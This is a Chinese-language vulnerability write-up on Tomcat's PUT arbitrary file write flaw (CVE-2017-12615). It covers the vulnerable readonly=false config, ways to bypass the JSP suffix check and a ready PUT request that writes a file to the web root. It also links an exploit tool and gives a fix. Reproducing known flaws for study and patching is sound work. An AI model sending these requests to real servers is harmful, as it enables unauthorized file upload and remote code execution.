登录 白背景

Tomcat PUT方法任意文件写入漏洞_CVE-2017-12615

漏洞介绍

当 Tomcat 启用了 HTTP PUT 请求方法,且设置了写权限(readonly=false),导致我们可以向服务器写入文件攻击者,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。但限制了jsp后缀,不过对于不同平台有多种绕过方法。

漏洞原理

 由于Tomcat `conf/web.xml`文件中配置了可写权限(readonly=false),导致可通过PUT方法向服务器写入文件,但是由于Tomcat对文件后缀会进行检测(不能直接写入jsp)。
  1. 通用的绕过方法使用/结尾,响应码201表示成功写入,响应码204也表示成功写入,但存在同名文件。
  2. windows下可采用::$DATA%20绕过
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

漏洞复现

通过发送如下数据包即可在web根目录写入shell:

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

利用工具

https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP

修复建议

将 readonly=true,默认为 true。

原文: https://www.yuque.com/xiaokp7/ocvun2/uxmxhzhxdfal3l7t